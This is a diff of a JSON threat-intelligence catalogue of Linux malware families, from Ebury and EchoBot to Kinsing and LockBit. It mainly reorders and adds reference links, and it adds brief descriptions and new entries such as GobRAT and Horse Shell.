"https://www.welivesecurity.com/wp-content/uploads/2018/12/ESET-The_Dark_Side_of_the_ForSSHe.pdf", + "https://www.welivesecurity.com/2017/10/30/windigo-ebury-update-2/", + "https://www.justice.gov/opa/pr/russian-citizen-pleads-guilty-involvement-global-botnet-conspiracy", + "https://www.welivesecurity.com/2014/02/21/an-in-depth-analysis-of-linuxebury/", + "https://www.welivesecurity.com/wp-content/uploads/2014/03/operation_windigo.pdf", + "https://security.web.cern.ch/security/advisories/windigo/windigo.shtml", + "https://csirt.gov.it/data/cms/posts/582/attachments/66ca2e9a-68cd-4df5-81a2-674c31a699c2/download", + "https://www.welivesecurity.com/2018/12/05/dark-side-of-the-forsshe/" ], "synonyms": [], "type": [] @@ -4476,9 +4647,10 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.echobot", "https://www.bleepingcomputer.com/news/security/new-echobot-botnet-variant-uses-over-50-exploits-to-propagate/", - "https://unit42.paloaltonetworks.com/new-mirai-variant-adds-8-new-exploits-targets-additional-iot-devices/", + "https://unit42.paloaltonetworks.com/mirai-variant-echobot-resurfaces-with-13-previously-unexploited-vulnerabilities/", "https://blogs.akamai.com/sitr/2019/06/latest-echobot-26-infection-vectors.html", - "https://www.f5.com/labs/articles/threat-intelligence/echobot-malware-now-up-to-71-exploits--targeting-scada" + "https://www.f5.com/labs/articles/threat-intelligence/echobot-malware-now-up-to-71-exploits--targeting-scada", + "https://unit42.paloaltonetworks.com/new-mirai-variant-adds-8-new-exploits-targets-additional-iot-devices/" ], "synonyms": [], "type": [] @@ -4492,10 +4664,10 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.enemybot", "https://www.fortinet.com/blog/threat-research/enemybot-a-look-into-keksecs-latest-ddos-botnet", + "https://cybersecurity.att.com/blogs/labs-research/rapidly-evolving-iot-malware-enemybot-now-targeting-content-management-system-servers", "https://cybersecurity.att.com/blogs/labs-research/shikitega-new-stealthy-malware-targeting-linux", "https://www.securonix.com/blog/detecting-the-enemybot-botnet-advisory/", - "https://www.securonix.com/blog/detecting-the-enemybot-botnet-advisory", - "https://cybersecurity.att.com/blogs/labs-research/rapidly-evolving-iot-malware-enemybot-now-targeting-content-management-system-servers" + "https://www.securonix.com/blog/detecting-the-enemybot-botnet-advisory" ], "synonyms": [], "type": [] @@ -4522,8 +4694,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.esxi_args", - "https://blog.ovhcloud.com/ransomware-targeting-vmware-esxi/", "https://www.bleepingcomputer.com/news/security/massive-esxiargs-ransomware-attack-targets-vmware-esxi-servers-worldwide/", + "https://blog.ovhcloud.com/ransomware-targeting-vmware-esxi/", "https://www.secuinfra.com/en/techtalk/hide-your-hypervisor-analysis-of-esxiargs-ransomware/", "https://www.youtube.com/watch?v=bBcvqxPdjoI" ], @@ -4534,13 +4706,13 @@ "value": "ESXiArgs" }, { - "description": "", + "description": "According to Infosec Institute, EvilGnome presents itself to unwitting Linux users as a legitimate GNOME extension. Legitimate extensions help to extend Linux functionality, but instead of a healthy boost in system functionality, EvilGnome begins spying on users with an array of functionalities uncommon for most Linux malware types.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.evilgnome", "https://ssu.gov.ua/uploads/files/DKIB/Technical%20report%20Armagedon.pdf", - "https://intezer.com/blog/linux/elf-malware-analysis-101-linux-threats-no-longer-an-afterthought", - "https://www.intezer.com/blog-evilgnome-rare-malware-spying-on-linux-desktop-users/" + "https://www.intezer.com/blog-evilgnome-rare-malware-spying-on-linux-desktop-users/", + "https://intezer.com/blog/linux/elf-malware-analysis-101-linux-threats-no-longer-an-afterthought" ], "synonyms": [], "type": [] @@ -4566,14 +4738,14 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.exaramel", - "https://www.wired.com/story/sandworm-centreon-russia-hack/", "https://pylos.co/wp-content/uploads/2020/02/Threat-Intelligence-and-the-Limits-of-Malware-Analysis.pdf", - "https://twitter.com/craiu/status/1361581668092493824", - "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-005.pdf", - "https://www.domaintools.com/resources/blog/centreon-to-exim-and-back-on-the-trail-of-sandworm", - "https://www.welivesecurity.com/wp-content/uploads/2021/04/ESET_Industry_Report_Government.pdf", "https://www.welivesecurity.com/2018/10/11/new-telebots-backdoor-linking-industroyer-notpetya/", - "https://attack.mitre.org/groups/G0034" + "https://www.wired.com/story/sandworm-centreon-russia-hack/", + "https://www.welivesecurity.com/wp-content/uploads/2021/04/ESET_Industry_Report_Government.pdf", + "https://attack.mitre.org/groups/G0034", + "https://www.domaintools.com/resources/blog/centreon-to-exim-and-back-on-the-trail-of-sandworm", + "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-005.pdf", + "https://twitter.com/craiu/status/1361581668092493824" ], "synonyms": [], "type": [] @@ -4614,9 +4786,9 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.fbot", "https://blog.malwaremustdie.org/2020/02/mmd-0065-2021-linuxmirai-fbot-re.html", - "https://blog.netlab.360.com/fbot-is-now-riding-the-traffic-and-transportation-smart-devices-en/", + "https://blog.malwaremustdie.org/2020/01/mmd-0065-2020-linuxmirai-fbot.html", "https://securitynews.sonicwall.com/xmlpost/vigilante-malware-removes-cryptominers-from-the-infected-device/", - "https://blog.malwaremustdie.org/2020/01/mmd-0065-2020-linuxmirai-fbot.html" + "https://blog.netlab.360.com/fbot-is-now-riding-the-traffic-and-transportation-smart-devices-en/" ], "synonyms": [], "type": [] @@ -4629,9 +4801,9 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.finfisher", + "https://securelist.com/finspy-unseen-findings/104322/", "https://www.amnesty.org/en/latest/research/2020/09/german-made-finspy-spyware-found-in-egypt-and-mac-and-linux-versions-revealed/", - "https://netzpolitik.org/2020/our-criminal-complaint-german-state-malware-company-finfisher-raided/", - "https://securelist.com/finspy-unseen-findings/104322/" + "https://netzpolitik.org/2020/our-criminal-complaint-german-state-malware-company-finfisher-raided/" ], "synonyms": [], "type": [] @@ -4657,8 +4829,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.fodcha", - "https://blog.netlab.360.com/fodcha-a-new-ddos-botnet/", - "https://www.bleepingcomputer.com/news/security/fodcha-ddos-botnet-reaches-1tbps-in-power-injects-ransoms-in-packets/" + "https://www.bleepingcomputer.com/news/security/fodcha-ddos-botnet-reaches-1tbps-in-power-injects-ransoms-in-packets/", + "https://blog.netlab.360.com/fodcha-a-new-ddos-botnet/" ], "synonyms": [], "type": [] @@ -4680,15 +4852,16 @@ "value": "FontOnLake" }, { - "description": "Guardicore has discovered FritzFrog, a sophisticated peer-to-peer (P2P) botnet which has been actively breaching SSH servers since January 2020. It is a worm which is written in Golang, and is modular, multi-threaded and fileless, leaving no trace on the infected machine’s disk. ", + "description": "Guardicore has discovered FritzFrog, a sophisticated peer-to-peer (P2P) botnet which has been actively breaching SSH servers since January 2020. It is a worm which is written in Golang, and is modular, multi-threaded and fileless, leaving no trace on the infected machine\u2019s disk. ", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.fritzfrog", - "https://www.akamai.com/blog/security/fritzfrog-p2p", - "https://www.securityweek.com/sophisticated-fritzfrog-p2p-botnet-returns-after-long-break", - "https://www.guardicore.com/2020/08/fritzfrog-p2p-botnet-infects-ssh-servers/", + "https://blog.netlab.360.com/p2p-botnets-review-status-continuous-monitoring/", "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf", - "https://www.intezer.com/blog/cloud-security/top-linux-cloud-threats-of-2020/" + "https://www.intezer.com/blog/cloud-security/top-linux-cloud-threats-of-2020/", + "https://www.akamai.com/blog/security/fritzfrog-p2p", + "https://www.guardicore.com/2020/08/fritzfrog-p2p-botnet-infects-ssh-servers/", + "https://www.securityweek.com/sophisticated-fritzfrog-p2p-botnet-returns-after-long-break" ], "synonyms": [], "type": [] @@ -4697,7 +4870,7 @@ "value": "FritzFrog" }, { - "description": "", + "description": "Gitpaste-12 is a modular malware first observed in October 2020 targeting Linux based x86 servers, as well as Linux ARM and MIPS based IoT devices. It uses GitHub and Pastebin as dead drop C2 locations.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.gitpaste12", @@ -4714,8 +4887,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.glupteba_proxy", - "https://decoded.avast.io/martinhron/meris-and-trickbot-standing-on-the-shoulders-of-giants/", - "https://thehackernews.com/2022/03/over-200000-microtik-routers-worldwide.html" + "https://thehackernews.com/2022/03/over-200000-microtik-routers-worldwide.html", + "https://decoded.avast.io/martinhron/meris-and-trickbot-standing-on-the-shoulders-of-giants/" ], "synonyms": [], "type": [] @@ -4723,6 +4896,19 @@ "uuid": "bcfec1d3-ff29-4677-a5f6-be285e98a9db", "value": "Glupteba Proxy" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.gobrat", + "https://blogs.jpcert.or.jp/en/2023/05/gobrat.html" + ], + "synonyms": [], + "type": [] + }, + "uuid": "ddba032c-ebde-4736-b7ef-8376702dac6a", + "value": "GobRAT" + }, { "description": "", "meta": { @@ -4793,14 +4979,15 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.hajime", + "https://par.nsf.gov/servlets/purl/10096257", "https://blog.netlab.360.com/quick-summary-port-8291-scan-en/", - "https://github.com/Psychotropos/hajime_hashes", + "https://www.symantec.com/connect/blogs/hajime-worm-battles-mirai-control-internet-things", + "http://blog.netlab.360.com/hajime-status-report-en/", + "https://blog.netlab.360.com/p2p-botnets-review-status-continuous-monitoring/", "https://security.radware.com/WorkArea/DownloadAsset.aspx?id=1461", "https://x86.re/blog/hajime-a-follow-up/", - "http://blog.netlab.360.com/hajime-status-report-en/", - "https://www.symantec.com/connect/blogs/hajime-worm-battles-mirai-control-internet-things", - "https://par.nsf.gov/servlets/purl/10096257", - "https://security.rapiditynetworks.com/publications/2016-10-16/hajime.pdf" + "https://security.rapiditynetworks.com/publications/2016-10-16/hajime.pdf", + "https://github.com/Psychotropos/hajime_hashes" ], "synonyms": [], "type": [] @@ -4839,8 +5026,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.hand_of_thief", - "https://blog.avast.com/2013/08/27/linux-trojan-hand-of-thief-ungloved/", - "https://web.archive.org/web/20130815040638/https://blogs.rsa.com/thieves-reaching-for-linux-hand-of-thief-trojan-targets-linux-inth3wild/" + "https://web.archive.org/web/20130815040638/https://blogs.rsa.com/thieves-reaching-for-linux-hand-of-thief-trojan-targets-linux-inth3wild/", + "https://blog.avast.com/2013/08/27/linux-trojan-hand-of-thief-ungloved/" ], "synonyms": [ "Hanthie" @@ -4869,17 +5056,17 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.hellokitty", - "https://www.govinfosecurity.com/vice-society-ransomware-gang-disrupted-spar-stores-a-18225", - "https://www.vmware.com/content/dam/digitalmarketing/vmware/en/pdf/docs/vmw-exposing-malware-in-linux-based-multi-cloud-environments.pdf", "https://blog.sekoia.io/vice-society-a-discreet-but-steady-double-extortion-ransomware-group/", - "https://unit42.paloaltonetworks.com/emerging-ransomware-groups/", - "https://soolidsnake.github.io/2021/07/17/hellokitty_linux.html", "https://blog.sekoia.io/vice-society-a-discreet-but-steady-double-extortion-ransomware-group", - "https://blogs.vmware.com/security/2022/09/esxi-targeting-ransomware-the-threats-that-are-after-your-virtual-machines-part-1.html", + "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself", + "https://unit42.paloaltonetworks.com/emerging-ransomware-groups/", + "https://www.vmware.com/content/dam/digitalmarketing/vmware/en/pdf/docs/vmw-exposing-malware-in-linux-based-multi-cloud-environments.pdf", "https://www.bleepingcomputer.com/news/security/linux-version-of-hellokitty-ransomware-targets-vmware-esxi-servers/", + "https://www.govinfosecurity.com/vice-society-ransomware-gang-disrupted-spar-stores-a-18225", + "https://blogs.vmware.com/security/2022/09/esxi-targeting-ransomware-the-threats-that-are-after-your-virtual-machines-part-1.html", "https://www.crowdstrike.com/blog/hypervisor-jackpotting-ecrime-actors-increase-targeting-of-esxi-servers/", - "https://www.esentire.com/blog/conti-affiliate-exposed-new-domain-names-ip-addresses-and-email-addresses-uncovered-by-esentire", - "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself" + "https://soolidsnake.github.io/2021/07/17/hellokitty_linux.html", + "https://www.esentire.com/blog/conti-affiliate-exposed-new-domain-names-ip-addresses-and-email-addresses-uncovered-by-esentire" ], "synonyms": [], "type": [] @@ -4892,6 +5079,7 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.hiatus_rat", + "https://blog.lumen.com/hiatusrat-takes-little-time-off-in-a-return-to-action/", "https://blog.lumen.com/new-hiatusrat-router-malware-covertly-spies-on-victims/" ], "synonyms": [], @@ -4901,13 +5089,13 @@ "value": "HiatusRAT" }, { - "description": "", + "description": "HiddenWasp is a Linux-based Trojan used to target systems for remote control. It comes in the form of a statically linked ELF binary with stdlibc++.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.hiddenwasp", "https://www.intezer.com/blog/incident-response/orbit-new-undetected-linux-threat/", - "https://intezer.com/blog/linux/elf-malware-analysis-101-linux-threats-no-longer-an-afterthought", - "https://www.intezer.com/blog-hiddenwasp-malware-targeting-linux-systems/" + "https://www.intezer.com/blog-hiddenwasp-malware-targeting-linux-systems/", + "https://intezer.com/blog/linux/elf-malware-analysis-101-linux-threats-no-longer-an-afterthought" ], "synonyms": [], "type": [] @@ -4920,15 +5108,16 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.hideandseek", - "https://blog.netlab.360.com/hns-botnet-recent-activities-en/", - "https://blog.avast.com/hide-n-seek-botnet-continues", - "https://threatlabs.avast.com/botnet", - "https://www.bleepingcomputer.com/news/security/new-hns-iot-botnet-has-already-amassed-14k-bots/", - "https://labs.bitdefender.com/2018/01/new-hide-n-seek-iot-botnet-using-custom-built-peer-to-peer-communication-spotted-in-the-wild/", "https://www.bleepingcomputer.com/news/security/hns-evolves-from-iot-to-cross-platform-botnet/", + "https://blog.netlab.360.com/hns-botnet-recent-activities-en/", + "https://threatlabs.avast.com/botnet", + "https://www.bleepingcomputer.com/news/security/hide-and-seek-becomes-first-iot-botnet-capable-of-surviving-device-reboots/", + "https://labs.bitdefender.com/2018/01/new-hide-n-seek-iot-botnet-using-custom-built-peer-to-peer-communication-spotted-in-the-wild/", "https://www.fortinet.com/blog/threat-research/searching-for-the-reuse-of-mirai-code--hide--n-seek-bot.html", + "https://unit42.paloaltonetworks.com/hide-n-seek-botnet-updates-arsenal-with-exploits-against-nexus-repository-manager-thinkphp/", "https://labs.bitdefender.com/2018/05/hide-and-seek-iot-botnet-resurfaces-with-new-tricks-persistence/", - "https://www.bleepingcomputer.com/news/security/hide-and-seek-becomes-first-iot-botnet-capable-of-surviving-device-reboots/" + "https://www.bleepingcomputer.com/news/security/new-hns-iot-botnet-has-already-amassed-14k-bots/", + "https://blog.avast.com/hide-n-seek-botnet-continues" ], "synonyms": [ "HNS" @@ -4969,26 +5158,27 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.hive", - "https://yoroi.company/research/on-the-footsteps-of-hive-ransomware/", - "https://lifars.com/2022/02/how-to-decrypt-the-files-encrypted-by-the-hive-ransomware/", - "https://securityaffairs.co/wordpress/128232/security/recover-files-hive-ransomware.html", - "https://www.bleepingcomputer.com/news/security/hive-ransomware-ports-its-linux-vmware-esxi-encryptor-to-rust/", - "https://www.threatstop.com/blog/first-conti-then-hive-costa-rica-gets-hit-with-ransomware-again", - "https://therecord.media/hive-ransomware-shuts-down-california-health-care-organization/", "https://github.com/reecdeep/HiveV5_file_decryptor", - "https://yoroi.company/wp-content/uploads/2022/07/Yoroi-On-The-Footsteps-of-Hive-Ransomware.pdf", - "https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-hive", - "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself", - "https://arxiv.org/pdf/2202.08477.pdf", - "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/06/23093553/Common-TTPs-of-the-modern-ransomware_low-res.pdf", - "https://twitter.com/malwrhunterteam/status/1455628865229950979", - "https://thehackernews.com/2022/02/master-key-for-hive-ransomware.html", "https://twitter.com/ESETresearch/status/1454100591261667329", + "https://thehackernews.com/2022/02/master-key-for-hive-ransomware.html", + "https://twitter.com/malwrhunterteam/status/1455628865229950979", + "https://securityaffairs.co/wordpress/128232/security/recover-files-hive-ransomware.html", + "https://lifars.com/2022/02/how-to-decrypt-the-files-encrypted-by-the-hive-ransomware/", + "https://krebsonsecurity.com/2023/05/russian-hacker-wazawaka-indicted-for-ransomware/", "https://therecord.media/academics-publish-method-for-recovering-data-encrypted-by-the-hive-ransomware/", - "https://blog.group-ib.com/hive", + "https://www.threatstop.com/blog/first-conti-then-hive-costa-rica-gets-hit-with-ransomware-again", "https://blogs.vmware.com/security/2022/09/esxi-targeting-ransomware-the-threats-that-are-after-your-virtual-machines-part-1.html", + "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/06/23093553/Common-TTPs-of-the-modern-ransomware_low-res.pdf", + "https://yoroi.company/wp-content/uploads/2022/07/Yoroi-On-The-Footsteps-of-Hive-Ransomware.pdf", + "https://blog.group-ib.com/hive", + "https://arxiv.org/pdf/2202.08477.pdf", "https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RE54L7v", + "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself", + "https://therecord.media/hive-ransomware-shuts-down-california-health-care-organization/", + "https://yoroi.company/research/on-the-footsteps-of-hive-ransomware/", "https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-april-1st-2022-i-can-fight-with-a-keyboard/", + "https://www.bleepingcomputer.com/news/security/hive-ransomware-ports-its-linux-vmware-esxi-encryptor-to-rust/", + "https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-hive", "https://github.com/rivitna/Malware/tree/main/Hive" ], "synonyms": [], @@ -4997,6 +5187,19 @@ "uuid": "c22452c8-c818-4577-9737-0b87342c7913", "value": "Hive (ELF)" }, + { + "description": "Checkpoint Research describes this as part of a custom firmware image affiliated with the Chinese state-sponsored actor \u201cCamaro Dragon\u201d, a custom MIPS32 ELF implant. HorseShell, the main implant inserted into the modified firmware by the attackers, provides the attacker with 3 main functionalities:\r\n* Remote shell: Execution of arbitrary shell commands on the infected router\r\n* File transfer: Upload and download files to and from the infected router.\r\n* SOCKS tunneling: Relay communication between different clients.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.horseshell", + "https://research.checkpoint.com/2023/the-dragon-who-sold-his-camaro-analyzing-custom-router-implant/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "9d04d96a-92fd-4731-a3b5-a3fdafd3e523", + "value": "Horse Shell" + }, { "description": "", "meta": { @@ -5062,11 +5265,11 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.ipstorm", - "https://www.bitdefender.com/files/News/CaseStudies/study/376/Bitdefender-Whitepaper-IPStorm.pdf", - "https://www.intezer.com/blog/research/a-storm-is-brewing-ipstorm-now-has-linux-malware/", "https://www.anomali.com/blog/the-interplanetary-storm-new-malware-in-wild-using-interplanetary-file-systems-ipfs-p2p-network", "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf", - "https://www.intezer.com/blog/cloud-security/top-linux-cloud-threats-of-2020/" + "https://www.intezer.com/blog/cloud-security/top-linux-cloud-threats-of-2020/", + "https://www.intezer.com/blog/research/a-storm-is-brewing-ipstorm-now-has-linux-malware/", + "https://www.bitdefender.com/files/News/CaseStudies/study/376/Bitdefender-Whitepaper-IPStorm.pdf" ], "synonyms": [ "InterPlanetary Storm" @@ -5094,12 +5297,12 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.kaiji", - "https://blog.trendmicro.com/trendlabs-security-intelligence/xorddos-kaiji-botnet-malware-variants-target-exposed-docker-servers/", - "https://blog.lumen.com/chaos-is-a-go-based-swiss-army-knife-of-malware/", - "https://www.bitdefender.com/box/blog/iot-news/kaiji-new-strain-iot-malware-seizing-control-launching-ddos-attacks/", "https://intezer.com/blog/research/kaiji-new-chinese-linux-malware-turning-to-golang/", + "https://www.bitdefender.com/box/blog/iot-news/kaiji-new-strain-iot-malware-seizing-control-launching-ddos-attacks/", "https://www.intezer.com/blog/cloud-security/top-linux-cloud-threats-of-2020/", - "https://www.ibm.com/downloads/cas/WMDZOWK6?social_post=5483919673&linkId=131648775" + "https://www.ibm.com/downloads/cas/WMDZOWK6?social_post=5483919673&linkId=131648775", + "https://blog.trendmicro.com/trendlabs-security-intelligence/xorddos-kaiji-botnet-malware-variants-target-exposed-docker-servers/", + "https://blog.lumen.com/chaos-is-a-go-based-swiss-army-knife-of-malware/" ], "synonyms": [], "type": [] @@ -5112,12 +5315,12 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.kaiten", - "https://www.lacework.com/blog/the-kek-security-network/", - "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/apache-log4j-zero-day", - "https://www.blackarrow.net/attackers-abuse-mobileirons-rce-to-deliver-kaiten/", - "https://www.akamai.com/us/en/multimedia/documents/state-of-the-internet/kaiten-std-router-ddos-malware-threat-advisory.pdf", "https://www.lacework.com/the-kek-security-network/", - "https://www.trendmicro.com/en_us/research/20/i/exposed-docker-server-abused-to-drop-cryptominer-ddos-bot-.html" + "https://www.blackarrow.net/attackers-abuse-mobileirons-rce-to-deliver-kaiten/", + "https://www.lacework.com/blog/the-kek-security-network/", + "https://www.akamai.com/us/en/multimedia/documents/state-of-the-internet/kaiten-std-router-ddos-malware-threat-advisory.pdf", + "https://www.trendmicro.com/en_us/research/20/i/exposed-docker-server-abused-to-drop-cryptominer-ddos-bot-.html", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/apache-log4j-zero-day" ], "synonyms": [ "STD" @@ -5132,10 +5335,10 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.kerberods", - "https://isc.sans.edu/forums/diary/Vulnerable+Apache+Jenkins+exploited+in+the+wild/24916", - "https://blog.talosintelligence.com/2019/09/watchbog-patching.html", - "https://www.anomali.com/blog/rocke-evolves-its-arsenal-with-a-new-malware-family-written-in-golang", "https://blog.trendmicro.com/trendlabs-security-intelligence/cve-2019-3396-redux-confluence-vulnerability-exploited-to-deliver-cryptocurrency-miner-with-rootkit/", + "https://isc.sans.edu/forums/diary/Vulnerable+Apache+Jenkins+exploited+in+the+wild/24916", + "https://www.anomali.com/blog/rocke-evolves-its-arsenal-with-a-new-malware-family-written-in-golang", + "https://blog.talosintelligence.com/2019/09/watchbog-patching.html", "https://www.fortinet.com/blog/threat-research/rocke-variant-ready-to-box-mining-challengers.html" ], "synonyms": [], @@ -5149,11 +5352,12 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.keyplug", + "https://experience.mandiant.com/trending-evil/p/1", "https://www.mandiant.com/resources/apt41-us-state-governments", "https://twitter.com/CyberJack42/status/1501290277864046595", - "https://www.mandiant.com/resources/mobileiron-log4shell-exploitation", - "https://experience.mandiant.com/trending-evil/p/1", - "https://i.blackhat.com/Asia-22/Thursday-Materials/AS-22-LeonSilvia-NextGenPlugXShadowPad.pdf" + "https://i.blackhat.com/Asia-22/Thursday-Materials/AS-22-LeonSilvia-NextGenPlugXShadowPad.pdf", + "https://go.recordedfuture.com/hubfs/reports/cta-2023-0330.pdf", + "https://www.mandiant.com/resources/mobileiron-log4shell-exploitation" ], "synonyms": [ "ELFSHELF" @@ -5181,25 +5385,26 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.kinsing", - "https://unit42.paloaltonetworks.com/atoms/moneylibra/", - "https://www.cadosecurity.com/analysis-of-initial-in-the-wild-attacks-exploiting-log4shell-log4j-cve-2021-44228/", - "https://www.alibabacloud.com/blog/new-outbreak-of-h2miner-worms-exploiting-redis-rce-detected_595743", - "https://www.cyberark.com/resources/threat-research-blog/kinsing-the-malware-with-two-faces", - "https://www.ibm.com/downloads/cas/WMDZOWK6?social_post=5483919673&linkId=131648775", "https://blog.aquasec.com/threat-alert-kinsing-malware-container-vulnerability", - "https://www.lacework.com/blog/kinsing-dark-iot-botnet-among-threats-targeting-cve-2022-26134/", + "https://www.cyberark.com/resources/threat-research-blog/kinsing-the-malware-with-two-faces", "https://sysdig.com/blog/zoom-into-kinsing-kdevtmpfsi/", - "https://medium.com/s2wblog/logs-of-log4shell-cve-2021-44228-log4j-is-ubiquitous-en-809064312039", - "https://www.zscaler.com/blogs/security-research/threatlabz-analysis-log4shell-cve-2021-44228-exploit-attempts", - "https://twitter.com/IntezerLabs/status/1259818964848386048", "https://www.vmware.com/content/dam/digitalmarketing/vmware/en/pdf/docs/vmw-exposing-malware-in-linux-based-multi-cloud-environments.pdf", - "https://unit42.paloaltonetworks.com/cve-2020-25213/", - "https://www.trendmicro.com/en_us/research/21/g/threat-actors-exploit-misconfigured-apache-hadoop-yarn.html", - "https://www.trendmicro.com/en_us/research/22/i/a-post-exploitation-look-at-coinminers-abusing-weblogic-vulnerab.html", - "https://www.bleepingcomputer.com/news/security/log4shell-exploits-now-used-mostly-for-ddos-botnets-cryptominers/", + "https://www.ibm.com/downloads/cas/WMDZOWK6?social_post=5483919673&linkId=131648775", + "https://twitter.com/IntezerLabs/status/1259818964848386048", "https://redcanary.com/blog/kinsing-malware-citrix-saltstack/", + "https://www.zscaler.com/blogs/security-research/threatlabz-analysis-log4shell-cve-2021-44228-exploit-attempts", + "https://medium.com/s2wblog/logs-of-log4shell-cve-2021-44228-log4j-is-ubiquitous-en-809064312039", + "https://unit42.paloaltonetworks.com/atoms/moneylibra/", + "https://www.bleepingcomputer.com/news/security/log4shell-exploits-now-used-mostly-for-ddos-botnets-cryptominers/", "https://www.trendmicro.com/en_us/research/20/k/analysis-of-kinsing-malwares-use-of-rootkit.html", - "https://www.intezer.com/blog/cloud-security/top-linux-cloud-threats-of-2020/" + "https://www.intezer.com/blog/cloud-security/top-linux-cloud-threats-of-2020/", + "https://www.alibabacloud.com/blog/new-outbreak-of-h2miner-worms-exploiting-redis-rce-detected_595743", + "https://www.trendmicro.com/en_us/research/22/i/a-post-exploitation-look-at-coinminers-abusing-weblogic-vulnerab.html", + "https://www.trendmicro.com/en_us/research/21/g/threat-actors-exploit-misconfigured-apache-hadoop-yarn.html", + "https://blog.aquasec.com/kinsing-malware-exploits-novel-openfire-vulnerability", + "https://unit42.paloaltonetworks.com/cve-2020-25213/", + "https://www.lacework.com/blog/kinsing-dark-iot-botnet-among-threats-targeting-cve-2022-26134/", + "https://www.cadosecurity.com/analysis-of-initial-in-the-wild-attacks-exploiting-log4shell-log4j-cve-2021-44228/" ], "synonyms": [ "h2miner" @@ -5227,9 +5432,9 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.kobalos", - "https://team-cymru.com/blog/2021/02/05/kobalos-malware-mapping/", - "https://www.welivesecurity.com/wp-content/uploads/2021/05/eset_threat_report_t12021.pdf", "https://www.welivesecurity.com/2021/02/02/kobalos-complex-linux-threat-high-performance-computing-infrastructure/", + "https://www.welivesecurity.com/wp-content/uploads/2021/05/eset_threat_report_t12021.pdf", + "https://team-cymru.com/blog/2021/02/05/kobalos-malware-mapping/", "https://www.welivesecurity.com/wp-content/uploads/2021/01/ESET_Kobalos.pdf" ], "synonyms": [], @@ -5327,21 +5532,25 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.lockbit", - "https://www.bleepingcomputer.com/news/security/lockbit-victim-estimates-cost-of-ransomware-attack-to-be-42-million/", - "https://blog.compass-security.com/2022/03/vpn-appliance-forensics/", - "https://www.trendmicro.com/en_us/research/22/a/analysis-and-Impact-of-lockbit-ransomwares-first-linux-and-vmware-esxi-variant.html", - "https://lifars.com/wp-content/uploads/2022/02/LockBitRansomware_Whitepaper.pdf", - "https://www.crowdstrike.com/blog/better-together-global-attitude-survey-takeaways-2021/", - "https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/conti-leaks-examining-the-panama-papers-of-ransomware.html", - "https://security.packt.com/understanding-lockbit/", - "https://analyst1.com/ransomware-diaries-volume-1/", - "https://noticeofpleadings.com/crackedcobaltstrike/files/ComplaintAndSummons/1%20-Microsoft%20Cobalt%20Strike%20-%20Complaint(907040021.9).pdf", - "https://www.dragos.com/blog/industry-news/dragos-ics-ot-ransomware-analysis-q4-2021/", - "https://blogs.vmware.com/security/2022/09/esxi-targeting-ransomware-the-threats-that-are-after-your-virtual-machines-part-1.html", - "https://www.ic3.gov/Media/News/2022/220204.pdf", "https://socradar.io/lockbit-3-another-upgrade-to-worlds-most-active-ransomware/", + "https://blog.compass-security.com/2022/03/vpn-appliance-forensics/", + 